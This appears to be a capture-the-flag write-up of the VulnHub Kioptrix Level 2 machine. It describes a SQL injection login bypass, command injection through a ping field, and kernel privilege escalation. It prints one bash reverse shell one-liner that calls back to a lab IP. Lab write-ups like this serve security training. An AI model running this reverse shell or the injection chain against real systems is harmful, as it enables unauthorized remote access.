Kioptrix Level 2 — VulnHub
Introduction:
Hello everyone. As i announced in previous write up that i will be doing the kioptrix series from vulnhub. In previous write up, i did the first box named kioptrix level 1. Today, i am writing about the second box in the series named Kioptrix level 2 or kioptrix 1.1. This was an easy box. For the initial foothold, we had a sql injection and a command injection. Then, we had the vulnerable kernel which led us to the root. So, let’s start.
Methodology:
First, we start off by running a full TCP scan, which lists the open ports. Then, we run the aggressive scan against found ports.
We can see that there are 7 ports open. MYSQL server is also exposed but we are not authorized to access it. On 631, we have vulnerable cups version but we cannot access it. So, navigating to HTTP(80) and HTTPS(443) both had the same login page.
Running gobuster didn’t lead us somewhere so i tried some basic SQLi payload which successfully logged me in.
On the homepage, it had an input field asked for an IP address and said it would ping the IP.
Inputting the IP address gives the output of the ping command.
Then, i check the request of the input field. It was POSTing the ip address as ip parameter. So, i thought that there might be a command injection if this parameter is directly supplied to ping command. So, i tested for command injection which successfully worked.
Then, i used the reverse shell payload from payload all the things repository and successfully got a shell.
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
Privilege Escalation:
For privilege escalation, i started with some basic enumeration. First, i found that there were two users on the machine. But, we can’t access their home directories.
I also tried to access the mysql service but the db was empty. So, after trying everything i did some system enumeration which revealed the kernel version and some useful information about distro and gcc compiler.
Googling the kernel version revealed that this version was vulnerable and exploiting it can lead to privilege escalation.
So, i cloned the POC from a github repo and transferred it to the target machine using the python http server.
On target machine, since i knew that there was gcc compiler available so, using it compiled the exploit and successfully got root.
Thanks.
